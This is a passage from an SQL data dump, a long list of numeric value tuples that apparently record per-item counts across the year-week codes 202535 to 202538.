2609,1,'202535',14),(2993,1,'202535',14),(3034,1,'202535',14),(3079,1,'202535',14),(3240,1,'202535',14),(3430,1,'202535',14),(3438,1,'202535',14),(3727,1,'202535',14),(3771,1,'202535',14),(4368,1,'202535',14),(4420,1,'202535',14),(4514,1,'202535',14),(4542,1,'202535',14),(4862,1,'202535',14),(5037,1,'202535',14),(5292,1,'202535',14),(5359,1,'202535',14),(5428,1,'202535',14),(5489,1,'202535',14),(1707,1,'202535',15),(1711,1,'202535',15),(1713,1,'202535',15),(1718,1,'202535',15),(1728,1,'202535',15),(1737,1,'202535',15),(1741,1,'202535',15),(1743,1,'202535',15),(2150,1,'202535',15),(2248,1,'202535',15),(2457,1,'202535',15),(3041,1,'202535',15),(3069,1,'202535',15),(3072,1,'202535',15),(3249,1,'202535',15),(3273,1,'202535',15),(3278,1,'202535',15),(3531,1,'202535',15),(3731,1,'202535',15),(3752,1,'202535',15),(4338,1,'202535',15),(4341,1,'202535',15),(4416,1,'202535',15),(4546,1,'202535',15),(4681,1,'202535',15),(4688,1,'202535',15),(4700,1,'202535',15),(4703,1,'202535',15),(4706,1,'202535',15),(4753,1,'202535',15),(4759,1,'202535',15),(4771,1,'202535',15),(4874,1,'202535',15),(4897,1,'202535',15),(5033,1,'202535',15),(5042,1,'202535',15),(5046,1,'202535',15),(5050,1,'202535',15),(5122,1,'202535',15),(5137,1,'202535',15),(5253,1,'202535',15),(5304,1,'202535',15),(1612,1,'202535',16),(1699,1,'202535',16),(1705,1,'202535',16),(1720,1,'202535',16),(1730,1,'202535',16),(1732,1,'202535',16),(1751,1,'202535',16),(1768,1,'202535',16),(1772,1,'202535',16),(1780,1,'202535',16),(2152,1,'202535',16),(3005,1,'202535',16),(3066,1,'202535',16),(3245,1,'202535',16),(3265,1,'202535',16),(3267,1,'202535',16),(3285,1,'202535',16),(3290,1,'202535',16),(3534,1,'202535',16),(3774,1,'202535',16),(4323,1,'202535',16),(4326,1,'202535',16),(4335,1,'202535',16),(4373,1,'202535',16),(4448,1,'202535',16),(4517,1,'202535',16),(4556,1,'202535',16),(4582,1,'202535',16),(4654,1,'202535',16),(4657,1,'202535',16),(4660,1,'202535',16),(4694,1,'202535',16),(4709,1,'202535',16),(4741,1,'202535',16),(5054,1,'202535',16),(5301,1,'202535',16),(480,1,'202535',17),(1726,1,'202535',17),(1770,1,'202535',17),(1774,1,'202535',17),(2751,1,'202535',17),(2769,1,'202535',17),(2964,1,'202535',17),(2965,1,'202535',17),(3004,1,'202535',17),(3045,1,'202535',17),(3063,1,'202535',17),(3127,1,'202535',17),(3257,1,'202535',17),(3307,1,'202535',17),(3498,1,'202535',17),(3749,1,'202535',17),(3777,1,'202535',17),(4377,1,'202535',17),(4424,1,'202535',17),(4440,1,'202535',17),(4444,1,'202535',17),(4454,1,'202535',17),(4608,1,'202535',17),(4645,1,'202535',17),(4756,1,'202535',17),(4866,1,'202535',17),(5128,1,'202535',17),(5276,1,'202535',17),(5298,1,'202535',17),(5307,1,'202535',17),(5320,1,'202535',17),(479,1,'202535',18),(486,1,'202535',18),(1586,1,'202535',18),(1610,1,'202535',18),(1701,1,'202535',18),(1782,1,'202535',18),(2159,1,'202535',18),(2178,1,'202535',18),(2558,1,'202535',18),(2801,1,'202535',18),(2809,1,'202535',18),(2989,1,'202535',18),(3006,1,'202535',18),(3117,1,'202535',18),(3486,1,'202535',18),(3489,1,'202535',18),(3735,1,'202535',18),(3764,1,'202535',18),(4396,1,'202535',18),(4432,1,'202535',18),(4551,1,'202535',18),(4697,1,'202535',18),(4765,1,'202535',18),(4893,1,'202535',18),(4976,1,'202535',18),(4980,1,'202535',18),(4988,1,'202535',18),(5101,1,'202535',18),(5163,1,'202535',18),(5271,1,'202535',18),(5280,1,'202535',18),(5314,1,'202535',18),(5317,1,'202535',18),(5334,1,'202535',18),(5353,1,'202535',18),(477,1,'202535',19),(482,1,'202535',19),(483,1,'202535',19),(485,1,'202535',19),(1722,1,'202535',19),(1745,1,'202535',19),(2165,1,'202535',19),(2617,1,'202535',19),(3083,1,'202535',19),(3087,1,'202535',19),(3124,1,'202535',19),(3275,1,'202535',19),(3316,1,'202535',19),(3479,1,'202535',19),(3482,1,'202535',19),(3721,1,'202535',19),(3742,1,'202535',19),(4457,1,'202535',19),(4524,1,'202535',19),(4566,1,'202535',19),(4648,1,'202535',19),(4888,1,'202535',19),(5131,1,'202535',19),(5146,1,'202535',19),(5323,1,'202535',19),(5415,1,'202535',19),(5467,1,'202535',19),(471,1,'202535',20),(1614,1,'202535',20),(1766,1,'202535',20),(2658,1,'202535',20),(3027,1,'202535',20),(3030,1,'202535',20),(3226,1,'202535',20),(4275,1,'202535',20),(4412,1,'202535',20),(4612,1,'202535',20),(4722,1,'202535',20),(4747,1,'202535',20),(4750,1,'202535',20),(5067,1,'202535',20),(5125,1,'202535',20),(5157,1,'202535',20),(5374,1,'202535',20),(5378,1,'202535',20),(476,1,'202535',21),(478,1,'202535',21),(1594,1,'202535',21),(1600,1,'202535',21),(1604,1,'202535',21),(1703,1,'202535',21),(1724,1,'202535',21),(2804,1,'202535',21),(3724,1,'202535',21),(4329,1,'202535',21),(4529,1,'202535',21),(4712,1,'202535',21),(4983,1,'202535',21),(4996,1,'202535',21),(5248,1,'202535',21),(5264,1,'202535',21),(5356,1,'202535',21),(5472,1,'202535',21),(5492,1,'202535',21),(484,1,'202535',22),(1776,1,'202535',22),(2309,1,'202535',22),(2704,1,'202535',22),(2748,1,'202535',22),(2956,1,'202535',22),(3710,1,'202535',22),(4301,1,'202535',22),(472,1,'202535',23),(481,1,'202535',23),(1590,1,'202535',23),(1608,1,'202535',23),(4651,1,'202535',23),(5058,1,'202535',23),(5062,1,'202535',23),(5076,1,'202535',23),(5310,1,'202535',23),(5330,1,'202535',23),(5412,1,'202535',23),(5425,1,'202535',23),(5433,1,'202535',23),(469,1,'202535',24),(488,1,'202535',24),(1544,1,'202535',24),(5153,1,'202535',24),(2911,1,'202535',25),(3023,1,'202535',25),(3259,1,'202535',25),(1584,1,'202535',26),(1598,1,'202535',26),(2775,1,'202535',26),(5363,1,'202535',26),(5409,1,'202535',26),(467,1,'202535',27),(2813,1,'202535',27),(3313,1,'202535',27),(5071,1,'202535',27),(5383,1,'202535',28),(5436,1,'202535',28),(5449,1,'202535',28),(5457,1,'202535',28),(5400,1,'202535',29),(5515,1,'202535',29),(5397,1,'202535',30),(5441,1,'202535',30),(5567,1,'202535',30),(5464,1,'202535',31),(5406,1,'202535',32),(1778,1,'202535',33),(5259,1,'202535',33),(5601,1,'202535',33),(1582,1,'202535',34),(5461,1,'202535',34),(5502,1,'202535',36),(473,1,'202535',38),(5454,1,'202535',38),(470,1,'202535',39),(5420,1,'202535',40),(5512,1,'202535',41),(487,1,'202535',42),(474,1,'202535',44),(3060,1,'202535',44),(5598,1,'202535',44),(74,1,'202535',45),(468,1,'202535',45),(5578,1,'202535',46),(5570,1,'202535',49),(3781,1,'202535',55),(5593,1,'202535',56),(4930,1,'202535',57),(5561,1,'202535',57),(5585,1,'202535',57),(108,1,'202535',58),(84,1,'202535',60),(87,1,'202535',63),(2904,1,'202535',65),(76,1,'202535',71),(91,1,'202535',71),(2503,1,'202535',87),(335,1,'202535',89),(5582,1,'202535',101),(89,1,'202535',106),(68,1,'202535',125),(72,1,'202535',135),(80,1,'202535',6037),(9,1,'202535',9260),(1697,1,'202536',2),(3714,1,'202536',2),(5256,1,'202536',2),(106,1,'202536',3),(3090,1,'202536',3),(4404,1,'202536',3),(4691,1,'202536',3),(4744,1,'202536',3),(4762,1,'202536',3),(4768,1,'202536',3),(4776,1,'202536',3),(5268,1,'202536',3),(1596,1,'202536',4),(1734,1,'202536',4),(3104,1,'202536',4),(3109,1,'202536',4),(4858,1,'202536',4),(4870,1,'202536',4),(4980,1,'202536',4),(5028,1,'202536',4),(102,1,'202536',5),(1695,1,'202536',5),(2991,1,'202536',5),(3096,1,'202536',5),(3280,1,'202536',5),(3282,1,'202536',5),(3287,1,'202536',5),(4238,1,'202536',5),(4357,1,'202536',5),(4663,1,'202536',5),(4668,1,'202536',5),(4674,1,'202536',5),(4878,1,'202536',5),(5140,1,'202536',5),(5326,1,'202536',5),(3746,1,'202536',6),(4587,1,'202536',6),(5080,1,'202536',6),(5134,1,'202536',6),(110,1,'202536',7),(3092,1,'202536',7),(3097,1,'202536',7),(3107,1,'202536',7),(4391,1,'202536',7),(1592,1,'202536',8),(1602,1,'202536',8),(2297,1,'202536',8),(3038,1,'202536',8),(4387,1,'202536',8),(1606,1,'202536',9),(4977,1,'202536',9),(3541,1,'202536',10),(1728,1,'202536',11),(3297,1,'202536',11),(4591,1,'202536',12),(1588,1,'202536',13),(4400,1,'202536',13),(5489,1,'202536',16),(3102,1,'202536',17),(5415,1,'202536',17),(5428,1,'202536',23),(1586,1,'202536',26),(5567,1,'202536',26),(5457,1,'202536',36),(1772,1,'202536',53),(2156,1,'202536',53),(1709,1,'202536',54),(1732,1,'202536',55),(1745,1,'202536',56),(1747,1,'202536',56),(2248,1,'202536',56),(2293,1,'202536',56),(3066,1,'202536',56),(1749,1,'202536',57),(1751,1,'202536',57),(3072,1,'202536',57),(4363,1,'202536',57),(2252,1,'202536',58),(4428,1,'202536',58),(4436,1,'202536',58),(1707,1,'202536',59),(4416,1,'202536',59),(4420,1,'202536',59),(1720,1,'202536',60),(3034,1,'202536',60),(3079,1,'202536',60),(3229,1,'202536',60),(3243,1,'202536',60),(3247,1,'202536',60),(3267,1,'202536',60),(3273,1,'202536',60),(3285,1,'202536',60),(4329,1,'202536',60),(4382,1,'202536',60),(4677,1,'202536',60),(4765,1,'202536',60),(4771,1,'202536',60),(4866,1,'202536',60),(4883,1,'202536',60),(5024,1,'202536',60),(1711,1,'202536',61),(1730,1,'202536',61),(2296,1,'202536',61),(2748,1,'202536',61),(3045,1,'202536',61),(3087,1,'202536',61),(3124,1,'202536',61),(3127,1,'202536',61),(3257,1,'202536',61),(3263,1,'202536',61),(3265,1,'202536',61),(3290,1,'202536',61),(3534,1,'202536',61),(4408,1,'202536',61),(4703,1,'202536',61),(5020,1,'202536',61),(5046,1,'202536',61),(5050,1,'202536',61),(5054,1,'202536',61),(5253,1,'202536',61),(5289,1,'202536',61),(1699,1,'202536',62),(1713,1,'202536',62),(1715,1,'202536',62),(1741,1,'202536',62),(1743,1,'202536',62),(1768,1,'202536',62),(1780,1,'202536',62),(2150,1,'202536',62),(2558,1,'202536',62),(2617,1,'202536',62),(3005,1,'202536',62),(3117,1,'202536',62),(3240,1,'202536',62),(3249,1,'202536',62),(3275,1,'202536',62),(3316,1,'202536',62),(4608,1,'202536',62),(4648,1,'202536',62),(4685,1,'202536',62),(4700,1,'202536',62),(4709,1,'202536',62),(4802,1,'202536',62),(5037,1,'202536',62),(570,1,'202536',63),(1705,1,'202536',63),(1726,1,'202536',63),(1737,1,'202536',63),(1776,1,'202536',63),(3027,1,'202536',63),(3041,1,'202536',63),(3063,1,'202536',63),(3245,1,'202536',63),(3764,1,'202536',63),(4275,1,'202536',63),(4341,1,'202536',63),(4432,1,'202536',63),(4440,1,'202536',63),(4514,1,'202536',63),(4654,1,'202536',63),(4688,1,'202536',63),(4694,1,'202536',63),(4706,1,'202536',63),(4747,1,'202536',63),(4759,1,'202536',63),(4888,1,'202536',63),(4976,1,'202536',63),(5295,1,'202536',63),(5307,1,'202536',63),(1722,1,'202536',64),(1739,1,'202536',64),(1782,1,'202536',64),(2063,1,'202536',64),(2159,1,'202536',64),(2609,1,'202536',64),(2658,1,'202536',64),(2809,1,'202536',64),(2911,1,'202536',64),(2964,1,'202536',64),(3004,1,'202536',64),(3060,1,'202536',64),(3253,1,'202536',64),(3261,1,'202536',64),(3269,1,'202536',64),(3430,1,'202536',64),(3489,1,'202536',64),(3721,1,'202536',64),(3724,1,'202536',64),(3735,1,'202536',64),(3738,1,'202536',64),(4323,1,'202536',64),(4368,1,'202536',64),(4444,1,'202536',64),(4542,1,'202536',64),(4651,1,'202536',64),(4657,1,'202536',64),(4681,1,'202536',64),(4756,1,'202536',64),(4792,1,'202536',64),(4797,1,'202536',64),(4897,1,'202536',64),(4988,1,'202536',64),(4996,1,'202536',64),(5137,1,'202536',64),(5301,1,'202536',64),(1724,1,'202536',65),(2148,1,'202536',65),(2154,1,'202536',65),(2161,1,'202536',65),(2165,1,'202536',65),(2751,1,'202536',65),(2769,1,'202536',65),(2965,1,'202536',65),(2993,1,'202536',65),(3251,1,'202536',65),(3438,1,'202536',65),(3498,1,'202536',65),(3710,1,'202536',65),(3727,1,'202536',65),(3731,1,'202536',65),(4326,1,'202536',65),(4338,1,'202536',65),(4373,1,'202536',65),(4424,1,'202536',65),(4454,1,'202536',65),(4517,1,'202536',65),(4566,1,'202536',65),(4862,1,'202536',65),(4874,1,'202536',65),(5042,1,'202536',65),(5271,1,'202536',65),(5292,1,'202536',65),(5298,1,'202536',65),(1612,1,'202536',66),(1718,1,'202536',66),(2152,1,'202536',66),(2956,1,'202536',66),(2989,1,'202536',66),(3226,1,'202536',66),(3259,1,'202536',66),(3271,1,'202536',66),(3278,1,'202536',66),(3307,1,'202536',66),(3531,1,'202536',66),(3742,1,'202536',66),(3771,1,'202536',66),(3777,1,'202536',66),(4301,1,'202536',66),(4332,1,'202536',66),(4377,1,'202536',66),(4396,1,'202536',66),(4524,1,'202536',66),(4645,1,'202536',66),(4753,1,'202536',66),(5058,1,'202536',66),(5131,1,'202536',66),(5276,1,'202536',66),(5304,1,'202536',66),(5310,1,'202536',66),(5317,1,'202536',66),(5383,1,'202536',66),(1701,1,'202536',67),(1770,1,'202536',67),(2178,1,'202536',67),(3313,1,'202536',67),(4335,1,'202536',67),(4412,1,'202536',67),(4546,1,'202536',67),(4551,1,'202536',67),(4712,1,'202536',67),(4722,1,'202536',67),(4741,1,'202536',67),(5033,1,'202536',67),(5067,1,'202536',67),(5076,1,'202536',67),(5122,1,'202536',67),(5146,1,'202536',67),(5314,1,'202536',67),(5323,1,'202536',67),(5378,1,'202536',67),(483,1,'202536',68),(1610,1,'202536',68),(1614,1,'202536',68),(1766,1,'202536',68),(3006,1,'202536',68),(3069,1,'202536',68),(3479,1,'202536',68),(3482,1,'202536',68),(4448,1,'202536',68),(4457,1,'202536',68),(4697,1,'202536',68),(4983,1,'202536',68),(5071,1,'202536',68),(5101,1,'202536',68),(5280,1,'202536',68),(5320,1,'202536',68),(5330,1,'202536',68),(5334,1,'202536',68),(5359,1,'202536',68),(478,1,'202536',69),(480,1,'202536',69),(488,1,'202536',69),(1594,1,'202536',69),(1774,1,'202536',69),(2704,1,'202536',69),(2804,1,'202536',69),(3486,1,'202536',69),(3774,1,'202536',69),(4582,1,'202536',69),(5128,1,'202536',69),(5153,1,'202536',69),(5157,1,'202536',69),(5163,1,'202536',69),(5248,1,'202536',69),(5259,1,'202536',69),(5353,1,'202536',69),(5356,1,'202536',69),(472,1,'202536',70),(477,1,'202536',70),(482,1,'202536',70),(485,1,'202536',70),(1590,1,'202536',70),(1600,1,'202536',70),(3083,1,'202536',70),(4556,1,'202536',70),(4893,1,'202536',70),(5472,1,'202536',70),(476,1,'202536',71),(481,1,'202536',71),(1598,1,'202536',71),(1703,1,'202536',71),(4520,1,'202536',71),(4612,1,'202536',71),(471,1,'202536',72),(479,1,'202536',72),(484,1,'202536',72),(1604,1,'202536',72),(2309,1,'202536',72),(2457,1,'202536',72),(2775,1,'202536',72),(2801,1,'202536',72),(3023,1,'202536',72),(3749,1,'202536',72),(5125,1,'202536',72),(5264,1,'202536',72),(5374,1,'202536',72),(486,1,'202536',73),(3752,1,'202536',73),(4529,1,'202536',73),(5397,1,'202536',73),(5412,1,'202536',73),(5578,1,'202536',73),(3030,1,'202536',74),(4750,1,'202536',74),(5425,1,'202536',74),(4660,1,'202536',75),(5363,1,'202536',76),(5433,1,'202536',76),(5464,1,'202536',76),(76,1,'202536',77),(1608,1,'202536',77),(469,1,'202536',78),(487,1,'202536',78),(5441,1,'202536',79),(5467,1,'202536',79),(5492,1,'202536',79),(1544,1,'202536',80),(1584,1,'202536',80),(468,1,'202536',81),(5062,1,'202536',81),(5406,1,'202536',82),(5454,1,'202536',82),(5515,1,'202536',83),(5570,1,'202536',83),(1778,1,'202536',84),(5585,1,'202536',84),(5400,1,'202536',85),(5449,1,'202536',85),(5461,1,'202536',86),(5512,1,'202536',86),(467,1,'202536',87),(473,1,'202536',87),(5436,1,'202536',87),(74,1,'202536',90),(474,1,'202536',90),(470,1,'202536',91),(5502,1,'202536',92),(108,1,'202536',94),(4930,1,'202536',94),(1582,1,'202536',95),(5561,1,'202536',95),(5420,1,'202536',96),(3781,1,'202536',97),(5409,1,'202536',97),(84,1,'202536',100),(5601,1,'202536',100),(2813,1,'202536',101),(5582,1,'202536',104),(5593,1,'202536',104),(87,1,'202536',113),(2904,1,'202536',115),(5605,1,'202536',116),(91,1,'202536',119),(335,1,'202536',131),(5598,1,'202536',162),(2503,1,'202536',185),(68,1,'202536',186),(89,1,'202536',231),(72,1,'202536',343),(80,1,'202536',578),(9,1,'202536',3226),(3541,1,'202537',3),(3096,1,'202537',4),(4404,1,'202537',4),(4858,1,'202537',4),(4870,1,'202537',4),(102,1,'202537',5),(106,1,'202537',5),(1695,1,'202537',5),(3107,1,'202537',5),(3109,1,'202537',5),(4391,1,'202537',5),(5080,1,'202537',5),(1588,1,'202537',6),(2991,1,'202537',6),(3090,1,'202537',6),(3092,1,'202537',6),(3280,1,'202537',6),(3282,1,'202537',6),(3746,1,'202537',6),(4357,1,'202537',6),(4387,1,'202537',6),(4587,1,'202537',6),(4878,1,'202537',6),(5028,1,'202537',6),(110,1,'202537',7),(1602,1,'202537',7),(3287,1,'202537',7),(4238,1,'202537',7),(4591,1,'202537',7),(4744,1,'202537',7),(5134,1,'202537',7),(5140,1,'202537',7),(1596,1,'202537',8),(1606,1,'202537',8),(1697,1,'202537',8),(2297,1,'202537',8),(3097,1,'202537',8),(3714,1,'202537',8),(4663,1,'202537',8),(5326,1,'202537',8),(1728,1,'202537',9),(4762,1,'202537',9),(4980,1,'202537',9),(5268,1,'202537',9),(1592,1,'202537',10),(1734,1,'202537',10),(3104,1,'202537',10),(4668,1,'202537',10),(4691,1,'202537',10),(4768,1,'202537',10),(4674,1,'202537',11),(4776,1,'202537',11),(5256,1,'202537',11),(4977,1,'202537',12),(3102,1,'202537',14),(4400,1,'202537',16),(3038,1,'202537',17),(1586,1,'202537',18),(3297,1,'202537',18),(5415,1,'202537',23),(5489,1,'202537',31),(5567,1,'202537',32),(5457,1,'202537',39),(5428,1,'202537',48),(76,1,'202537',49),(1772,1,'202537',79),(1732,1,'202537',80),(1745,1,'202537',82),(2293,1,'202537',83),(2252,1,'202537',84),(1709,1,'202537',85),(2156,1,'202537',85),(2248,1,'202537',85),(2296,1,'202537',85),(3063,1,'202537',85),(1747,1,'202537',89),(3066,1,'202537',89),(3072,1,'202537',90),(4416,1,'202537',90),(4436,1,'202537',90),(3117,1,'202537',92),(4428,1,'202537',92),(3045,1,'202537',93),(3069,1,'202537',93),(3124,1,'202537',93),(4363,1,'202537',93),(4420,1,'202537',93),(1749,1,'202537',94),(1726,1,'202537',95),(1701,1,'202537',96),(1743,1,'202537',96),(1751,1,'202537',96),(4883,1,'202537',96),(1705,1,'202537',97),(1707,1,'202537',97),(1720,1,'202537',97),(1737,1,'202537',97),(3247,1,'202537',97),(1713,1,'202537',98),(1715,1,'202537',98),(2993,1,'202537',98),(3127,1,'202537',98),(3290,1,'202537',98),(1739,1,'202537',99),(3034,1,'202537',99),(3079,1,'202537',99),(3273,1,'202537',99),(3307,1,'202537',99),(1711,1,'202537',100),(1722,1,'202537',100),(1768,1,'202537',100),(3257,1,'202537',100),(1730,1,'202537',102),(1741,1,'202537',102),(3253,1,'202537',102),(3265,1,'202537',102),(2154,1,'202537',103),(2165,1,'202537',103),(2178,1,'202537',103),(3030,1,'202537',103),(3261,1,'202537',103),(3731,1,'202537',103),(5024,1,'202537',103),(2148,1,'202537',104),(3027,1,'202537',104),(3249,1,'202537',104),(3263,1,'202537',104),(5037,1,'202537',104),(5050,1,'202537',104),(1724,1,'202537',105),(2063,1,'202537',105),(2152,1,'202537',105),(3060,1,'202537',105),(3087,1,'202537',105),(3269,1,'202537',105),(3278,1,'202537',105),(3285,1,'202537',105),(3313,1,'202537',105),(3727,1,'202537',105),(4323,1,'202537',105),(4706,1,'202537',105),(1699,1,'202537',106),(2150,1,'202537',106),(2609,1,'202537',106),(2658,1,'202537',106),(3243,1,'202537',106),(3245,1,'202537',106),(3267,1,'202537',106),(3498,1,'202537',106),(3735,1,'202537',106),(4802,1,'202537',106),(4897,1,'202537',106),(5020,1,'202537',106),(5054,1,'202537',106),(1766,1,'202537',107),(1782,1,'202537',107),(2161,1,'202537',107),(3240,1,'202537',107),(4332,1,'202537',107),(4382,1,'202537',107),(4432,1,'202537',107),(4440,1,'202537',107),(4444,1,'202537',107),(4542,1,'202537',107),(4654,1,'202537',107),(4709,1,'202537',107),(4765,1,'202537',107),(4797,1,'202537',107),(4862,1,'202537',107),(4866,1,'202537',107),(5042,1,'202537',107),(5046,1,'202537',107),(1590,1,'202537',108),(2911,1,'202537',108),(2989,1,'202537',108),(3316,1,'202537',108),(3479,1,'202537',108),(3752,1,'202537',108),(4408,1,'202537',108),(4651,1,'202537',108),(4657,1,'202537',108),(4893,1,'202537',108),(5131,1,'202537',108),(5137,1,'202537',108),(471,1,'202537',109),(570,1,'202537',109),(1703,1,'202537',109),(1770,1,'202537',109),(2159,1,'202537',109),(3229,1,'202537',109),(3271,1,'202537',109),(3489,1,'202537',109),(3531,1,'202537',109),(3721,1,'202537',109),(3724,1,'202537',109),(3738,1,'202537',109),(4329,1,'202537',109),(4551,1,'202537',109),(4566,1,'202537',109),(4612,1,'202537',109),(4753,1,'202537',109),(4888,1,'202537',109),(5058,1,'202537',109),(5071,1,'202537',109),(5122,1,'202537',109),(5253,1,'202537',109),(5295,1,'202537',109),(478,1,'202537',110),(480,1,'202537',110),(481,1,'202537',110),(488,1,'202537',110),(1610,1,'202537',110),(2457,1,'202537',110),(2748,1,'202537',110),(2769,1,'202537',110),(3005,1,'202537',110),(3251,1,'202537',110),(3275,1,'202537',110),(3764,1,'202537',110),(4326,1,'202537',110),(4377,1,'202537',110),(4424,1,'202537',110),(4454,1,'202537',110),(4648,1,'202537',110),(4697,1,'202537',110),(5276,1,'202537',110),(5467,1,'202537',110),(469,1,'202537',111),(483,1,'202537',111),(1776,1,'202537',111),(1780,1,'202537',111),(2617,1,'202537',111),(2751,1,'202537',111),(3004,1,'202537',111),(3226,1,'202537',111),(3710,1,'202537',111),(3774,1,'202537',111),(3777,1,'202537',111),(4275,1,'202537',111),(4335,1,'202537',111),(4373,1,'202537',111),(4396,1,'202537',111),(4457,1,'202537',111),(4514,1,'202537',111),(4546,1,'202537',111),(4645,1,'202537',111),(4694,1,'202537',111),(4703,1,'202537',111),(4792,1,'202537',111),(4874,1,'202537',111),(4996,1,'202537',111),(5033,1,'202537',111),(5271,1,'202537',111),(472,1,'202537',112),(477,1,'202537',112),(482,1,'202537',112),(1584,1,'202537',112),(1718,1,'202537',112),(2956,1,'202537',112),(2964,1,'202537',112),(2965,1,'202537',112),(3006,1,'202537',112),(3482,1,'202537',112),(3486,1,'202537',112),(4301,1,'202537',112),(4338,1,'202537',112),(4368,1,'202537',112),(4412,1,'202537',112),(4448,1,'202537',112),(4677,1,'202537',112),(4756,1,'202537',112),(4976,1,'202537',112),(5067,1,'202537',112),(5076,1,'202537',112),(5128,1,'202537',112),(5157,1,'202537',112),(5317,1,'202537',112),(5330,1,'202537',112),(5374,1,'202537',112),(5383,1,'202537',112),(5472,1,'202537',112),(485,1,'202537',113),(486,1,'202537',113),(1594,1,'202537',113),(2801,1,'202537',113),(3534,1,'202537',113),(3742,1,'202537',113),(4341,1,'202537',113),(4517,1,'202537',113),(4582,1,'202537',113),(4608,1,'202537',113),(4681,1,'202537',113),(4688,1,'202537',113),(4700,1,'202537',113),(4722,1,'202537',113),(4741,1,'202537',113),(4771,1,'202537',113),(5062,1,'202537',113),(5101,1,'202537',113),(5248,1,'202537',113),(5259,1,'202537',113),(5304,1,'202537',113),(5353,1,'202537',113),(484,1,'202537',114),(1604,1,'202537',114),(1774,1,'202537',114),(3023,1,'202537',114),(4556,1,'202537',114),(4712,1,'202537',114),(4759,1,'202537',114),(5125,1,'202537',114),(5264,1,'202537',114),(5289,1,'202537',114),(5292,1,'202537',114),(5310,1,'202537',114),(5314,1,'202537',114),(5363,1,'202537',114),(1600,1,'202537',115),(1612,1,'202537',115),(2558,1,'202537',115),(3749,1,'202537',115),(4520,1,'202537',115),(4529,1,'202537',115),(4685,1,'202537',115),(5153,1,'202537',115),(5280,1,'202537',115),(5298,1,'202537',115),(5323,1,'202537',115),(5359,1,'202537',115),(5378,1,'202537',115),(470,1,'202537',116),(476,1,'202537',116),(1614,1,'202537',116),(2809,1,'202537',116),(3083,1,'202537',116),(3438,1,'202537',116),(3771,1,'202537',116),(4747,1,'202537',116),(5146,1,'202537',116),(5163,1,'202537',116),(5334,1,'202537',116),(479,1,'202537',117),(1608,1,'202537',117),(2804,1,'202537',117),(4524,1,'202537',117),(5307,1,'202537',117),(2775,1,'202537',118),(3259,1,'202537',118),(3430,1,'202537',118),(4660,1,'202537',118),(473,1,'202537',119),(4988,1,'202537',119),(5461,1,'202537',119),(468,1,'202537',120),(2813,1,'202537',120),(3041,1,'202537',120),(5425,1,'202537',120),(487,1,'202537',121),(4983,1,'202537',121),(5356,1,'202537',121),(5397,1,'202537',121),(74,1,'202537',122),(2309,1,'202537',122),(4750,1,'202537',122),(5301,1,'202537',122),(5320,1,'202537',122),(1778,1,'202537',123),(1544,1,'202537',124),(5578,1,'202537',124),(5585,1,'202537',124),(1598,1,'202537',125),(5400,1,'202537',125),(5412,1,'202537',125),(5492,1,'202537',125),(108,1,'202537',126),(5433,1,'202537',126),(5449,1,'202537',126),(467,1,'202537',127),(5515,1,'202537',127),(474,1,'202537',129),(84,1,'202537',130),(5570,1,'202537',130),(4930,1,'202537',131),(5593,1,'202537',131),(1582,1,'202537',133),(5406,1,'202537',133),(5454,1,'202537',133),(5409,1,'202537',134),(5512,1,'202537',134),(5601,1,'202537',134),(87,1,'202537',135),(2704,1,'202537',135),(3781,1,'202537',135),(5605,1,'202537',135),(5436,1,'202537',136),(5441,1,'202537',136),(5464,1,'202537',136),(5502,1,'202537',137),(5420,1,'202537',141),(91,1,'202537',145),(2904,1,'202537',149),(335,1,'202537',150),(5582,1,'202537',150),(5561,1,'202537',151),(5598,1,'202537',155),(68,1,'202537',196),(2503,1,'202537',250),(89,1,'202537',340),(80,1,'202537',499),(72,1,'202537',528),(9,1,'202537',2894),(4870,1,'202538',3),(106,1,'202538',4),(1697,1,'202538',4),(3109,1,'202538',4),(3541,1,'202538',4),(1596,1,'202538',5),(1734,1,'202538',5),(3092,1,'202538',5),(3096,1,'202538',5),(3280,1,'202538',5),(4404,1,'202538',5),(4674,1,'202538',5),(4762,1,'202538',5),(4768,1,'202538',5),(4878,1,'202538',5),(5028,1,'202538',5),(5256,1,'202538',5),(102,1,'202538',6),(1695,1,'202538',6),(3104,1,'202538',6),(3107,1,'202538',6),(4387,1,'202538',6),(4587,1,'202538',6),(4691,1,'202538',6),(4744,1,'202538',6),(4858,1,'202538',6),(5080,1,'202538',6),(5268,1,'202538',6),(1592,1,'202538',7),(1602,1,'202538',7),(1606,1,'202538',7),(2297,1,'202538',7),(3090,1,'202538',7),(3282,1,'202538',7),(3287,1,'202538',7),(4357,1,'202538',7),(5134,1,'202538',7),(5140,1,'202538',7),(5326,1,'202538',7),(3746,1,'202538',8),(4391,1,'202538',8),(3297,1,'202538',9),(3714,1,'202538',9),(4591,1,'202538',9),(4663,1,'202538',9),(2991,1,'202538',10),(4776,1,'202538',10),(4980,1,'202538',10),(110,1,'202538',11),(4977,1,'202538',11),(1588,1,'202538',12),(4238,1,'202538',13),(4668,1,'202538',13),(1728,1,'202538',15),(3038,1,'202538',15),(3102,1,'202538',15),(3097,1,'202538',16),(4400,1,'202538',17),(5489,1,'202538',24),(5415,1,'202538',26),(1586,1,'202538',29),(76,1,'202538',32),(5567,1,'202538',32),(5428,1,'202538',33),(5457,1,'202538',34),(1745,1,'202538',99),(1732,1,'202538',100),(1772,1,'202538',103),(2156,1,'202538',103),(2252,1,'202538',103),(1747,1,'202538',104),(2293,1,'202538',104),(2296,1,'202538',104),(2248,1,'202538',105),(1709,1,'202538',109),(3063,1,'202538',109),(3066,1,'202538',112),(3072,1,'202538',112),(4363,1,'202538',112),(3069,1,'202538',113),(3045,1,'202538',117),(4436,1,'202538',117),(4416,1,'202538',119),(4428,1,'202538',119),(1713,1,'202538',121),(1743,1,'202538',121),(2993,1,'202538',121),(3124,1,'202538',121),(1711,1,'202538',122),(1722,1,'202538',122),(3117,1,'202538',122),(1715,1,'202538',123),(1707,1,'202538',124),(1720,1,'202538',124),(1749,1,'202538',124),(1751,1,'202538',124),(3034,1,'202538',124),(3290,1,'202538',124),(1701,1,'202538',126),(1705,1,'202538',126),(3079,1,'202538',126),(3127,1,'202538',126),(4420,1,'202538',126),(4883,1,'202538',126),(3273,1,'202538',128),(3307,1,'202538',129),(1730,1,'202538',131),(1741,1,'202538',131),(3247,1,'202538',131),(3030,1,'202538',133),(1739,1,'202538',135),(3316,1,'202538',135),(1737,1,'202538',136),(1726,1,'202538',137),(3727,1,'202538',137),(1724,1,'202538',138),(3731,1,'202538',138),(1768,1,'202538',139),(3257,1,'202538',139),(3269,1,'202538',139),(3285,1,'202538',139),(3261,1,'202538',140),(3267,1,'202538',140),(3278,1,'202538',140)